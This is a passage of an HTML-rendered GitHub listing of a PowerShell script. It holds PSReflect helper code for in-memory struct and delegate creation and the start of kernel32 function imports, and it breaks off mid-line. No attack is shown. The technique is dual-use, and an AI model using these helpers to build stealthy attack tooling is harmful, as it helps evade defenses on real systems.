class=\"blob-code blob-code-inner js-file-line\">                {</td>\n      </tr>\n      <tr>\n        <td id=\"L681\" class=\"blob-num js-line-number\" data-line-number=\"681\"></td>\n        <td id=\"LC681\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">AttribBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> Reflection.Emit.CustomAttributeBuilder<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">ConstructorInfo</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[Object[]]</span> <span class=\"pl-k\">@($</span><span class=\"pl-smi\">UnmanagedType</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L682\" class=\"blob-num js-line-number\" data-line-number=\"682\"></td>\n        <td id=\"LC682\" class=\"blob-code blob-code-inner js-file-line\">                }</td>\n      </tr>\n      <tr>\n        <td id=\"L683\" class=\"blob-num js-line-number\" data-line-number=\"683\"></td>\n        <td id=\"LC683\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L684\" class=\"blob-num js-line-number\" data-line-number=\"684\"></td>\n        <td id=\"LC684\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">NewField</span><span class=\"pl-en\">.SetCustomAttribute</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">AttribBuilder</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L685\" class=\"blob-num js-line-number\" data-line-number=\"685\"></td>\n        <td id=\"LC685\" class=\"blob-code blob-code-inner js-file-line\">            }</td>\n      </tr>\n      <tr>\n        <td id=\"L686\" class=\"blob-num js-line-number\" data-line-number=\"686\"></td>\n        <td id=\"LC686\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L687\" class=\"blob-num js-line-number\" data-line-number=\"687\"></td>\n        <td id=\"LC687\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">ExplicitLayout</span><span class=\"pl-k\">)</span> { <span class=\"pl-k\">$</span><span class=\"pl-smi\">NewField</span><span class=\"pl-en\">.SetOffset</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Offset</span><span class=\"pl-k\">)</span> }</td>\n      </tr>\n      <tr>\n        <td id=\"L688\" class=\"blob-num js-line-number\" data-line-number=\"688\"></td>\n        <td id=\"LC688\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L689\" class=\"blob-num js-line-number\" data-line-number=\"689\"></td>\n        <td id=\"LC689\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L690\" class=\"blob-num js-line-number\" data-line-number=\"690\"></td>\n        <td id=\"LC690\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\"># Make the struct aware of its own size.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L691\" class=\"blob-num js-line-number\" data-line-number=\"691\"></td>\n        <td id=\"LC691\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\"># No more having to call [Runtime.InteropServices.Marshal]::SizeOf!</span></td>\n      </tr>\n      <tr>\n        <td id=\"L692\" class=\"blob-num js-line-number\" data-line-number=\"692\"></td>\n        <td id=\"LC692\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">SizeMethod</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructBuilder</span><span class=\"pl-en\">.DefineMethod</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;GetSize&#39;</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L693\" class=\"blob-num js-line-number\" data-line-number=\"693\"></td>\n        <td id=\"LC693\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-s\">&#39;Public, Static&#39;</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L694\" class=\"blob-num js-line-number\" data-line-number=\"694\"></td>\n        <td id=\"LC694\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Int]</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L695\" class=\"blob-num js-line-number\" data-line-number=\"695\"></td>\n        <td id=\"LC695\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type[]]</span> <span class=\"pl-k\">@()</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L696\" class=\"blob-num js-line-number\" data-line-number=\"696\"></td>\n        <td id=\"LC696\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">SizeMethod</span><span class=\"pl-en\">.GetILGenerator</span><span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L697\" class=\"blob-num js-line-number\" data-line-number=\"697\"></td>\n        <td id=\"LC697\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\"># Thanks for the help, Jason Shirk!</span></td>\n      </tr>\n      <tr>\n        <td id=\"L698\" class=\"blob-num js-line-number\" data-line-number=\"698\"></td>\n        <td id=\"LC698\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Ldtoken<span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructBuilder</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L699\" class=\"blob-num js-line-number\" data-line-number=\"699\"></td>\n        <td id=\"LC699\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Call<span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L700\" class=\"blob-num js-line-number\" data-line-number=\"700\"></td>\n        <td id=\"LC700\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type]</span>.GetMethod<span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;GetTypeFromHandle&#39;</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L701\" class=\"blob-num js-line-number\" data-line-number=\"701\"></td>\n        <td id=\"LC701\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Call<span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L702\" class=\"blob-num js-line-number\" data-line-number=\"702\"></td>\n        <td id=\"LC702\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Runtime.InteropServices.Marshal]</span>.GetMethod<span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;SizeOf&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[Type[]]</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[Type]</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L703\" class=\"blob-num js-line-number\" data-line-number=\"703\"></td>\n        <td id=\"LC703\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Ret<span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L704\" class=\"blob-num js-line-number\" data-line-number=\"704\"></td>\n        <td id=\"LC704\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L705\" class=\"blob-num js-line-number\" data-line-number=\"705\"></td>\n        <td id=\"LC705\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\"># Allow for explicit casting from an IntPtr</span></td>\n      </tr>\n      <tr>\n        <td id=\"L706\" class=\"blob-num js-line-number\" data-line-number=\"706\"></td>\n        <td id=\"LC706\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\"># No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure!</span></td>\n      </tr>\n      <tr>\n        <td id=\"L707\" class=\"blob-num js-line-number\" data-line-number=\"707\"></td>\n        <td id=\"LC707\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ImplicitConverter</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructBuilder</span><span class=\"pl-en\">.DefineMethod</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;op_Implicit&#39;</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L708\" class=\"blob-num js-line-number\" data-line-number=\"708\"></td>\n        <td id=\"LC708\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-s\">&#39;PrivateScope, Public, Static, HideBySig, SpecialName&#39;</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L709\" class=\"blob-num js-line-number\" data-line-number=\"709\"></td>\n        <td id=\"LC709\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructBuilder</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L710\" class=\"blob-num js-line-number\" data-line-number=\"710\"></td>\n        <td id=\"LC710\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type[]]</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[IntPtr]</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L711\" class=\"blob-num js-line-number\" data-line-number=\"711\"></td>\n        <td id=\"LC711\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator2</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ImplicitConverter</span><span class=\"pl-en\">.GetILGenerator</span><span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L712\" class=\"blob-num js-line-number\" data-line-number=\"712\"></td>\n        <td id=\"LC712\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator2</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Nop<span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L713\" class=\"blob-num js-line-number\" data-line-number=\"713\"></td>\n        <td id=\"LC713\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator2</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Ldarg_0<span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L714\" class=\"blob-num js-line-number\" data-line-number=\"714\"></td>\n        <td id=\"LC714\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator2</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Ldtoken<span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructBuilder</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L715\" class=\"blob-num js-line-number\" data-line-number=\"715\"></td>\n        <td id=\"LC715\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator2</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Call<span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L716\" class=\"blob-num js-line-number\" data-line-number=\"716\"></td>\n        <td id=\"LC716\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type]</span>.GetMethod<span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;GetTypeFromHandle&#39;</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L717\" class=\"blob-num js-line-number\" data-line-number=\"717\"></td>\n        <td id=\"LC717\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator2</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Call<span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L718\" class=\"blob-num js-line-number\" data-line-number=\"718\"></td>\n        <td id=\"LC718\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Runtime.InteropServices.Marshal]</span>.GetMethod<span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;PtrToStructure&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[Type[]]</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[IntPtr]</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[Type]</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L719\" class=\"blob-num js-line-number\" data-line-number=\"719\"></td>\n        <td id=\"LC719\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator2</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Unbox_Any<span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructBuilder</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L720\" class=\"blob-num js-line-number\" data-line-number=\"720\"></td>\n        <td id=\"LC720\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ILGenerator2</span><span class=\"pl-en\">.Emit</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[Reflection.Emit.OpCodes]</span>::Ret<span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L721\" class=\"blob-num js-line-number\" data-line-number=\"721\"></td>\n        <td id=\"LC721\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L722\" class=\"blob-num js-line-number\" data-line-number=\"722\"></td>\n        <td id=\"LC722\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructBuilder</span><span class=\"pl-en\">.CreateType</span><span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L723\" class=\"blob-num js-line-number\" data-line-number=\"723\"></td>\n        <td id=\"LC723\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L724\" class=\"blob-num js-line-number\" data-line-number=\"724\"></td>\n        <td id=\"LC724\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c\">#end of PSREFLECT CODE</span></td>\n      </tr>\n      <tr>\n        <td id=\"L725\" class=\"blob-num js-line-number\" data-line-number=\"725\"></td>\n        <td id=\"LC725\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L726\" class=\"blob-num js-line-number\" data-line-number=\"726\"></td>\n        <td id=\"LC726\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c\">#http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html</span></td>\n      </tr>\n      <tr>\n        <td id=\"L727\" class=\"blob-num js-line-number\" data-line-number=\"727\"></td>\n        <td id=\"LC727\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L728\" class=\"blob-num js-line-number\" data-line-number=\"728\"></td>\n        <td id=\"LC728\" class=\"blob-code blob-code-inner js-file-line\">    </td>\n      </tr>\n      <tr>\n        <td id=\"L729\" class=\"blob-num js-line-number\" data-line-number=\"729\"></td>\n        <td id=\"LC729\" class=\"blob-code blob-code-inner js-file-line\">   </td>\n      </tr>\n      <tr>\n        <td id=\"L730\" class=\"blob-num js-line-number\" data-line-number=\"730\"></td>\n        <td id=\"LC730\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c\">#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/</span></td>\n      </tr>\n      <tr>\n        <td id=\"L731\" class=\"blob-num js-line-number\" data-line-number=\"731\"></td>\n        <td id=\"LC731\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">Function</span> <span class=\"pl-en\">Get-DelegateType</span></td>\n      </tr>\n      <tr>\n        <td id=\"L732\" class=\"blob-num js-line-number\" data-line-number=\"732\"></td>\n        <td id=\"LC732\" class=\"blob-code blob-code-inner js-file-line\">    {</td>\n      </tr>\n      <tr>\n        <td id=\"L733\" class=\"blob-num js-line-number\" data-line-number=\"733\"></td>\n        <td id=\"LC733\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">Param</span></td>\n      </tr>\n      <tr>\n        <td id=\"L734\" class=\"blob-num js-line-number\" data-line-number=\"734\"></td>\n        <td id=\"LC734\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L735\" class=\"blob-num js-line-number\" data-line-number=\"735\"></td>\n        <td id=\"LC735\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[OutputTyp<span class=\"pl-ent\">e</span></span><span class=\"pl-e\">([<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Type</span><span class=\"pl-smi\">]</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L736\" class=\"blob-num js-line-number\" data-line-number=\"736\"></td>\n        <td id=\"LC736\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L737\" class=\"blob-num js-line-number\" data-line-number=\"737\"></td>\n        <td id=\"LC737\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">( <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 0</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L738\" class=\"blob-num js-line-number\" data-line-number=\"738\"></td>\n        <td id=\"LC738\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type[]]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L739\" class=\"blob-num js-line-number\" data-line-number=\"739\"></td>\n        <td id=\"LC739\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Parameters</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">(</span><span class=\"pl-c1\">New-Object</span> Type<span class=\"pl-e\">[]</span><span class=\"pl-k\">(</span><span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L740\" class=\"blob-num js-line-number\" data-line-number=\"740\"></td>\n        <td id=\"LC740\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L741\" class=\"blob-num js-line-number\" data-line-number=\"741\"></td>\n        <td id=\"LC741\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">( <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 1 </span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L742\" class=\"blob-num js-line-number\" data-line-number=\"742\"></td>\n        <td id=\"LC742\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L743\" class=\"blob-num js-line-number\" data-line-number=\"743\"></td>\n        <td id=\"LC743\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">ReturnType</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[Void]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L744\" class=\"blob-num js-line-number\" data-line-number=\"744\"></td>\n        <td id=\"LC744\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L745\" class=\"blob-num js-line-number\" data-line-number=\"745\"></td>\n        <td id=\"LC745\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L746\" class=\"blob-num js-line-number\" data-line-number=\"746\"></td>\n        <td id=\"LC746\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">Domain</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[AppDomain]</span>::CurrentDomain</td>\n      </tr>\n      <tr>\n        <td id=\"L747\" class=\"blob-num js-line-number\" data-line-number=\"747\"></td>\n        <td id=\"LC747\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">DynAssembly</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> System.Reflection.AssemblyName<span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;ReflectedDelegate&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L748\" class=\"blob-num js-line-number\" data-line-number=\"748\"></td>\n        <td id=\"LC748\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">AssemblyBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Domain</span><span class=\"pl-en\">.DefineDynamicAssembly</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DynAssembly</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[System.Reflection.Emit.AssemblyBuilderAccess]</span>::Run<span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L749\" class=\"blob-num js-line-number\" data-line-number=\"749\"></td>\n        <td id=\"LC749\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ModuleBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">AssemblyBuilder</span><span class=\"pl-en\">.DefineDynamicModule</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;InMemoryModule&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-c1\">false</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L750\" class=\"blob-num js-line-number\" data-line-number=\"750\"></td>\n        <td id=\"LC750\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ModuleBuilder</span><span class=\"pl-en\">.DefineType</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;MyDelegateType&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&#39;Class, Public, Sealed, AnsiClass, AutoClass&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[System.MulticastDelegate]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L751\" class=\"blob-num js-line-number\" data-line-number=\"751\"></td>\n        <td id=\"LC751\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ConstructorBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeBuilder</span><span class=\"pl-en\">.DefineConstructor</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;RTSpecialName, HideBySig, Public&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[System.Reflection.CallingConventions]</span>::Standard<span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Parameters</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L752\" class=\"blob-num js-line-number\" data-line-number=\"752\"></td>\n        <td id=\"LC752\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ConstructorBuilder</span><span class=\"pl-en\">.SetImplementationFlags</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;Runtime, Managed&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L753\" class=\"blob-num js-line-number\" data-line-number=\"753\"></td>\n        <td id=\"LC753\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">MethodBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeBuilder</span><span class=\"pl-en\">.DefineMethod</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;Invoke&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&#39;Public, HideBySig, NewSlot, Virtual&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ReturnType</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Parameters</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L754\" class=\"blob-num js-line-number\" data-line-number=\"754\"></td>\n        <td id=\"LC754\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">MethodBuilder</span><span class=\"pl-en\">.SetImplementationFlags</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;Runtime, Managed&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L755\" class=\"blob-num js-line-number\" data-line-number=\"755\"></td>\n        <td id=\"LC755\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L756\" class=\"blob-num js-line-number\" data-line-number=\"756\"></td>\n        <td id=\"LC756\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c1\">Write-Output</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeBuilder</span><span class=\"pl-en\">.CreateType</span><span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L757\" class=\"blob-num js-line-number\" data-line-number=\"757\"></td>\n        <td id=\"LC757\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L758\" class=\"blob-num js-line-number\" data-line-number=\"758\"></td>\n        <td id=\"LC758\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L759\" class=\"blob-num js-line-number\" data-line-number=\"759\"></td>\n        <td id=\"LC759\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L760\" class=\"blob-num js-line-number\" data-line-number=\"760\"></td>\n        <td id=\"LC760\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">Mod</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-InMemoryModule</span> <span class=\"pl-k\">-</span>ModuleName Win32</td>\n      </tr>\n      <tr>\n        <td id=\"L761\" class=\"blob-num js-line-number\" data-line-number=\"761\"></td>\n        <td id=\"LC761\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L762\" class=\"blob-num js-line-number\" data-line-number=\"762\"></td>\n        <td id=\"LC762\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">FunctionDefinitions</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">@(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L763\" class=\"blob-num js-line-number\" data-line-number=\"763\"></td>\n        <td id=\"LC763\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span>func kernel32 GetProcAddress <span class=\"pl-k\">(</span><span class=\"pl-e\">[IntPtr]</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[IntPtr]</span><span 